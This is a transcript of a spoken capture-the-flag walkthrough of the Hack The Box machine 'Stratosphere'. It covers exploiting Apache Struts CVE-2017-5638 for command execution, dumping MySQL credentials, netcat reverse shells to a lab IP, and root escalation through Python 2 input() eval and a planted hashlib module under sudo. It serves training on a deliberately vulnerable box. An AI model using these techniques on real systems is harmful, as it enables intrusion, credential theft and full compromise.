Hello everyone, welcome back to another edition of Can You Hack It? I am Ben, aka Iceman, and this week we're going to be taking a look at another box on Hackthebox.eu. This one's called Stratosphere. It's a Linux box with about a medium level of difficulty, and one of the things we're going to do a little bit differently this time is we're going to actually look at two different ways to get our privilege escalation on at the end. So this is actually the second take of this video. The first one, the mic was unmuted this week, but for some reason didn't record the audio still. So take two will hopefully be better, and hopefully I didn't leave any artifacts around for us to trip on. But let's go ahead and get started on the box. So we can minimize our browser, bring up the terminal. First things first, let's make a directory to work out of. So we do make dir -p Stratosphere. And then Nmap. And so the -p will just make all the parent directories. That way it makes Stratosphere and the Nmap directory. And we can just change into Stratosphere. Long night apparently. Change into Stratosphere. And then we can start Nmap. So we just do Nmap -t5 to make it aggressive on the timing. V to make verbose output, so it outputs while it's running. SV for scripts and versions. OA for output all formats. We'll output them to Nmap quick. And then the IP address of the machine, 10.10.10.64. And so the three ports that it finds open are 22, which is SSH, 80 and 8080. So 80 and 8080 are web servers likely. So if we go ahead and let's pop open another tab here real quick and get Gofuzz running, just so we have it scanning the web server on port 80 at least. So if we do user share word lists, dirbuster, directory 23 medium, we do show full response codes, recursive, hide response codes of 404, extensions of HTML and PHP, and that should be, just make it aggressive by doing 100 threads, that should be good. 10.10.10.64/buzz. So we got that running already. While that's running, let's take a manual look at the site. 10.10.64. Apparently I didn't clear out my history, so you could actually see it down there. So Stratosphere, we're here to protect your credit. It looks like it's some sort of credit monitoring identity protection site. Not really sure what the framework it's written in is. Getting started.html just has a under construction. I don't really see anything else that we can click on here, well, other than the language, which doesn't appear to do anything. So we check 8080. It looks like it's basically the exact same site. So it's just a duplicate, possibly the same site, possibly a different one. So if we go back to our scan, so we found manager, we found our index on our getting started, which we already knew, and we found manager, which looks like Tomcat. So we could try admin, Tomcat secret with a 3, I think. S3 CRET. Tomcat. Yeah, so presumably we don't have credentials there. We could try and brute force that, but we won't for now. For the most part on most of these challenges, brute forcing like that isn't required, although there are a few that I've seen, so I won't say it's never, but we'll check out this monitoring link instead. So loading, Stratosphere credit monitoring, welcome.action, which is something you don't see too often, or at least I don't notice it too often. I happen to know what it is, but I'll show you how we would figure out where to go from here. We do admin, features under construction. So this was a common thing people asked me about on the forums. They said they didn't really know where to go from here. They didn't get what .action was. There was a ton of subtle and some not so subtle clues on there. Basically, you just Google for action or .action. I think this will work. Vulnerability. Yeah, so the bunch of results all about Apache Struts vulnerabilities. There's two different ones that were found. There's a 9791 which I'm not familiar with what the issue there was. And then there's 5638, and 5638 was a issue with the way the Jakarta multi-part parser handled exceptions. Basically, we could inject custom content type in the header that wasn't something that existed. And due to the way the exception handling occurred, we could actually get it to execute our code by injecting arbitrary commands we want it to write, to run in that field in OGNL, which I think is like Object Graph Navigation Language, something like that. Doesn't matter. So basically, the first link here is just looks like a Python script. They've got some examples of how to run it. Looks like it's got the ability to check and see if a site's vulnerable. We can go ahead and take that when we use it. So we copy it, and then we'll paste it in here. Struts-pwn.py. So we do Python struts-pwn.py help URL. URL is our welcome page here, somewhere, wherever it went. Did I navigate off of it here, I guess? Yeah. So if we paste that and we do a -- check, shows that it is vulnerable. You could also have done this with Nmap directly, which I didn't happen to notice. No, I don't think our Nmap scan actually picked that up because of the fact that there wasn't a direct link to it. So it wasn't aware of its existence. I think we could make it aware by doing something like Nmap P80. There's probably a million ways you could do this, but this is just another one if you wanted to use Nmap. Vuln CVE 2017 5638, I think 5638. Script args path, I believe. That's monitoring example. Welcome.action. Don't know if it's case sensitive. Action. And then the IP address of the machine. And so I probably screwed something up there. Nmap port 80 -- script plus HTTP vuln CVE 2017. Oh, I think I know what the problem is. I think there's no dash between the CVE and the year. Yeah. So we can see here that it also finds that it's vulnerable. So we should be able to do something. We continue to use our script here. Do something like -c for command, and then who am I? So we see that we're Tomcat 8. On some versions of Python with, I forget which library it is, there's a specific library that's utilized by this script. There's an issue, and so we get this incomplete read stuff. It's safe to ignore, just so if you were ever curious, if you were running this particular script and you saw that, ignore it. It doesn't matter. And so let's see what we have in this directory that we're in. We'll see pwd. So in varlib tomcat 8, so web server directory, lsla. So we've got a Tomcat configuration file. We've got a file called dbconnect. We've got lib directory. We've got a symbolic link for logs, policy, web app, work. So the first thing that stands out here is that dbconnect file, because it's a file called dbconnect. So you assume that there could likely be credentials or something in here. So we cat it, cat dbconnect. And we can see that it's got a couple sets of credentials. One that says SSN with a user that's SSN admin and a password, a random password. Oops. And then users admin. So we can just save those here, set them to the side. Let's see if we can get a reverse shell through here. So let's go ahead and cancel this out. Let's do netcat lbnp, and we'll listen on 4444. Yeah, whatever. And then we can look up the syntax for the bash reverse shell using pentest monkey. Pentest monkey reverse shells. So we can try this one at first. Oops. Apparently didn't copy it. Just change our IP address to 10.10.14.15, and I actually don't remember. I think we did 4444. Yeah. So 4444. Copy this, and we paste it. Done. I think that error is the first time I've seen that, so it's possible that something went wrong there. We didn't get a reverse connection. We could see if this system has netcat on it. A lot of the ones on here do. Which NC? It does. So we could try it. C dash help. So this is the good version that has -e on it. So -e bin bash 10 14 15 4444. Still not getting anything back. Since this is executing directly, I don't think it's anything with our formatting, or it should be anything like a WAF. Just for fun and education, I'll show a way we could get around if it was something like a WAF filtering the IP address, which again, I don't think it is, but it's just something we can try. You can calculate your integer value for your IP address by basically taking each octet and doing a little bit of math on them. So we take our first octet, which is 10 times 256 to the third, plus our second one, which is also 10 times 256 to the second, plus our third one, which is 14 times 256, and then our last one, which is 15. Oh, did I put X in there? No, what I was thinking. So this is the integer version of our IP address. You can try using that. See if that works. Doesn't look like it. I assume that should have worked. 4444, we can test it locally. Testing. We saw a connection, saw testing, so it should have worked, but it didn't. So for whatever reason, we can't get connections back. It's most likely a firewall configuration. We can dig into that once we get onto the system, if I remember, and if we can get sufficient privileges. So we can just continue to use this struts vulnerability script to kind of poke around. We've got the connectdb. We can do a cat etc password, see which users are on this system. Maybe do a grep bash. I think this will work. Yeah. So we've got 3 users that have bash as their default shell. I don't know if we have any with sh. No. So we've got root, Richard, and Tomcat as valid users. So we're already Tomcat 8. Richard's probably our target then. And then root obviously is what we're going to try and privilege escalate to. Back in this full list, see if we see anything interesting or that gives stuff away. Sometimes people seem to overlook that a lot of services install accounts, such as MySQL. So that gives us an idea that MySQL is running on this system. And our credentials we found here were in DB Connect, so it's likely that one pair of these credentials is usable for our for connecting to the MySQL that's running on here. We can try and see if we can list the database by just piping some commands to it, since we can't use an interactive MySQL terminal through this tool. So what we can do instead is do something like show, or sorry, we're going to need to echo it, I think, echo show databases. And we can pipe that to MySQL-u, is it SSN admin, and whatever this password is. And see what we get. So access is denied for SSN admin. The other one was just admin. So that one looks like it did work. So we see information database, or information schema and users. If you notice here, this says users at the top, so I guess that makes sense. This is the credential for that. I'm not really sure what the SSN one's for. Maybe we'll figure that out at a different point. But for now, we've got users, so let's see if we can dig into users then. So if we do the same thing, let's replace this with use users, show tables. So it looks like we have a single table called accounts. So we should be able to dump everything in accounts if we just do use users, select splat from accounts. And it looks like we've got one account in there. Full name's Richard F. Smith, which, if we remember from above, Richard was our target account. Password is this long thing, and username's Richard. So it's likely that Richard, that we can use this Richard account. So if we do trying to think if there's a way we can test it through here. Oh, actually we have SSH open on this box, so we can try and SSH Richard at 10.10.10.64 and then paste that password. Maybe I don't have that password. Oh, I didn't copy it apparently. So let's try that again. And so that worked. So we're able to get in with Richard's credentials. And so now we just need to see if we can, first of all, I suppose we should look for the user flag, which should be right here. Oh, see, and this is what I was afraid of. I didn't actually clean up after this box yet because I realized that the audio didn't work right away. So some of this stuff, rmpy, and I can't do it. So I'm going to pause this video, restart the box, and then we'll continue. Okay, so we're back. Box has been reverted. Everything's clean. So we see in Richard's directory, we've got the user text, we've got a test.py, and then we've got his desktop. And so if we do a cat user.text, we can pipe that to cut-c, get the first 16 characters. You can see that we can read the user flag, and those are the first 16 characters of it. So now all we've got left to do is figure out how to Privesc. And so normally, first thing I do before I download Enum and some of these other things to run is just do a quick check, see what I find around. First command I always run is sudo-l, see what I can run without a password. In this case, it looks like we can run Python and a specific script. Now, the asterisk, for people that aren't familiar with it, means that it can be Python with anything else attached to it. So it can be Python 2, 3, 2.7, Python snakes. Not that that's a real thing, but it doesn't matter as long as I think a space terminates whatever it is. And so that means we can run that as root without a password. And so we could see what this, let's look closer at this test.py. So we can see that it's owned by root, and it looks like we can't write it. We can read it, we can execute it. And so we can go ahead and cat it then. And so it looks like what it's doing is it's got a function called question, and it's got a series of questions. Each question asks you to solve a hash, and then it takes your input, it computes the hash, it sees if they match. If they do, then you get to go on to the next round. If they don't, you get an error message and it drops out. And so it looks like it's a MD5 hash, a SHA-1, and MD4. These should all be pretty easy if they're not salted. We can probably just use CrackStation. The fourth one is a Blake 2B512, so 512-bit. That I don't know of any online repositories for, so we're probably going to have to crack that with Hashcat. And then upon all those completing, we import OS and we make a call to root success.py. So we can go ahead and compute these values ahead of time. So we take this one and we go to CrackStation. I wonder if we can mix and match. I've never actually tried to do this. You can put in, I put in a bunch of the same type of hash before, but I haven't put in a mix of different types of hashes. But we'll see if it allows that to make it a little bit faster. Sorry, I keep forgetting the right key to hit copying in the command line. We're not a robot, and we want to crack the hashes. And so there we got them. It was able to get all three, MD5, SHA-1, MD4. And so that leaves us our final one. Well, let's copy all these over. Okay, boo-boo. And Ninja something. And Legend 72. And so then we just need to crack our fourth one, which is this Blake 2 hash. So if we, let's see, vim or echo this into q4.hash, and I think we need to have something at the beginning to let it know what type of hash it is, because this is hashcat we're going to use, so hashcat Blake 2b examples. And it's right there, so it looks like $Blake, $2, so we take that and we will put that at the beginning. And then we just need to run hashcat help grep, make it not case sensitive, and look for Blake. So type is 600. So then if we do hashcat, which by the way, this is a fresh built VM, so hopefully this works okay, because I don't have GPU support in here. I do have the Intel libraries, so we should at least be able to run this. I just don't know how fast it'll be. And we'll use rocky.txt. List rocky.txt. Now hash is loaded. Did I screw that up? Then q4.hash. Oh, I did. So I didn't end up pasting it in. And so it looks like that went pretty fast. Although it exhausted, it didn't find a match. I might have screwed up copying since I was, yeah, I did. That 9 got left out, I think. Is that all it was? Yeah, it looks like it. sure what it's complaining about now. Oh, it found it. Show. So it looks like it's this. So we've got our 4 answers now. Go ahead and queue up this first one. So if we do user and Python 3 home Richard test.py. Oh, sudo. So it wants us to solve the first one. What is that? Wants us to solve the second one. That. Third one is legend 72. And the fourth one is this. I apparently didn't have it. And then it errors out because it wasn't able to find success.py apparently. So we're kind of left at a dead end here. We can't edit test.py, and let's see, test.py. And so this is where a lot of people seem to get stuck. I had a ton of questions come in on the forum about what to do at this point. Personally, I was able to figure out what to do fairly easily because I've seen this problem before. But if you hadn't, you may look at this and figure that there's not a whole lot you can do because you can't edit this file. And so a lot of people just kept looking for other ways in. As far as I know, there weren't any, but here's the thought process I had on the first time I encountered a problem like this. So basically what it was is you look at what you can possibly manipulate here. So you're giving input, and your input's used where? It's used in this input function, it's used in these hash functions. And so if there's a way to get it to do what you want, it has to be either an issue with input or an issue with these hash functions. And so the first way we'll go about doing it is trying to find an issue with the functions it uses. First one's input, so we just look for Python input, input and vulnerability. And we see a few come up. And so if we just take a look at these, I suppose I probably could have shown, I think I have one on my blog, although I don't know that it's published. I think I started writing it, and as with many, I didn't finish. But basically, it looks like what they're saying is Python 3 and Python 2 have a different implementation of input. Python 3, input is the same thing as raw input, so it just takes raw input from the user, stores it as an object. Python 2, there were 2 functions. There was input and raw input. Raw input was taking raw input from the user. Input actually was wrapped with an eval function. And so what that meant is that input could execute Python code. So it basically looked like this. And so we can take advantage of that fact by doing something like running test.py. And actually, I'm running it with Python 3 here. That's intentional. I want to show that this didn't work in Python 3 because Python 3 had a different way that it handled it. But basically, we should be able to do something along the lines of import a library that we could use, like OS, and then make a system call. And we could do like a ID. And so if we paste that in here, it just says, sorry, that's not right. But if we change this to Python 2, which we're allowed to do, because remember, it allows us to do anything after the word Python as far as which program we run. We paste this in now, you see we crash. But before we crashed, we actually got the result from the code we ran. And then what happened after that was the type wasn't what was expected. It didn't have the encode attribute, and so it crashed when it tried to do that MD5. And so we can abuse this to get information that we want. We could maybe inject a Python shell in here. I had tried it a little bit when I first did this box. It all failed again. I think this goes back to our problem with the firewall. Technically, I probably could have, which maybe we'll try, injected or changed the firewall rules and then pop the shell, but it's not really important in this case, especially for a challenge like this where you're just trying to get a flag. We can get the flag easy enough by doing a system call to cat root.text, pipe that to cut. And so this should do what we want. So if we do this again, give that for the answer, and we can see the first 16 digits of the root flag. The last of those 16 is 204. And so that's one way to do this challenge. Now the second way to do this challenge is actually, if we cat test.py again, is going to kind of abuse these hex or the hashing functions. We're not actually going to abuse the hashing functions because we don't have, as far as I know, there's no vulnerabilities in any of these, but there's an issue with how imports are handled. And I think it's just with how imports are handled in Python 3. I don't know if it's in Python 2 also. We can try it, but I didn't have success previously making this work in Python 2. So if we do like a vim, and what we're going to do is call this hashlib.py. And so it's matching that import up top. Oh, there, vim. Okay, hashlib.py. And then in here, we can just use normal Python code, import OS, and we can define MD5 or any of the other function calls that they're using in their script. And we can have this do the same thing, OS system, cat root.text, pipe that to cut C1 through 16. And so that should allow us to, let's try with Python 2 first. So that one, what it'll do is when we put in the correct hash here, it should make this call to MD5, and when it makes this call to MD5, it should be calling our code, which tells it to print out the root flags for 16 characters. And so in this case, for this one, we need the actual correct value so that we get it to execute this line right here, right below. Which actually, no, I guess we don't need the correct value because they're matching it later on. We could just give it anything we wanted there. And so in this case, it errored out, it didn't print, so it didn't use our custom module. It's the same thing. So for whatever reason, Python 2 doesn't work with this. I haven't looked at the details of how imports are handled between the two. My assumption is that they're different. So here it asks us for it. If we just say D and hit enter, we see that it printed out the first 16 characters of our root flag, which we can see is the same as these ones. D41 ends in 204. D41 ends in 204. So we're able to get the same, or achieve the same thing either way. So if all we had to work with was Python 2, we can make it work. If all we had to work with was Python 3, we could make it work. Let's take a look here real quick and see. I don't know why my terminal's acting weird. Let's see if we can change this to take a look at the firewall rules. So just doing IP tables -VNL. And so we can see that the input table has a default of drop. It's allowing new and established connections that match port 22 or 8080. That's interesting. I don't see a match rule for regular port 80. So that's interesting. They may have a rule beforehand that's forwarding port 80 requests up to 8080, I guess. So let's take a look at that. So if we look at pre-routing, it should be VNL's fine. -tnet, I think. Oops. That made that uppercase, but man, having some issues apparently. Okay, let's do this a different way. Let's I don't know what's going on. Since this is a normal shell, it shouldn't be acting up, but we can do it this way instead. So we can do iptables -vnl -tnet. So we need to execute that with Python 2. Yeah, so it's got a redirect for 80 to 8080. So that's probably why our reverse shells were failing, is if you notice up here, our output's set to accept everything. It's set to drop in on the local interface out on, or sorry, in on anything out on the loopback, but it's set to accept all by default and then accept all new and established. So my guess is because the default input policies drop and they're not allowing related. So we would have had to go out on port 8080. Just for fun, I'm going to revert this box anyway, so we can try doing an iptables -p input accept, I think. So we did that. Oh, except we don't want to actually do that there. The whole terminal is acting up. It's possible somebody reset this box. Looks like we had some connectivity issues. Oops. So if we log back in, and we were going to do this sudo user local bin, I think, sudo l user bin. So sudo user bin python 2 home richard test.py. Give it this. Could not initialize iptables table mat with a capital T. Oh, vim. That one has nothing to do with the other. I think our rules got put in, but let's clear out that the hash lib.py. And just delete that line out. So now if we do this again, our hashlib file is creating issues. rm hashlib.py. I actually don't know if this is going to still cause issues anyway, because there is a compiled one I didn't remember to remove. So if we did like a iptables VNL here again, and now we can see that the input policy is accept. So let's start up our netcat listener again and see lvmp 4444. And so now if we were to have executed netcat through that, the struts vulnerability again, we would have done Like netcat-e bin bash 10.10.14.15.1337. Connection refused. Oh, sorry. 4444. And so now we can see that we actually have a connection and we have a shell. So we would have been able to get a shell had the firewall been set up to allow it, but it wasn't. And so we can actually change that back now, theoretically. If we just, I don't know what's going on with my mouse. All my inputs seem to be lagging, so if we just change this back, although I'm going to revert this box anyway, but p input drop. Run this again. And so this would have allowed us to get a root shell if we wanted one for some reason. You could have popped open a port in the firewall, then used either one of these vulnerabilities, the input or the importing one, and used a Python shell or something and been able to get a root shell. In this case, we already got everything, and you've seen how you could do it if you really wanted to, because I know some people just love popping that shell. But for now, we'll go ahead and just call it good. So if you liked the video, go ahead and subscribe to the channel. Give it a thumbs up. You know, positive stuff like that's appreciated. Negative stuff, keep it to yourself. And if you want to hit me up on Hack the Box or follow me on Twitter, feel free to do that. I hope you all have a great weekend, and I will see you in this next video.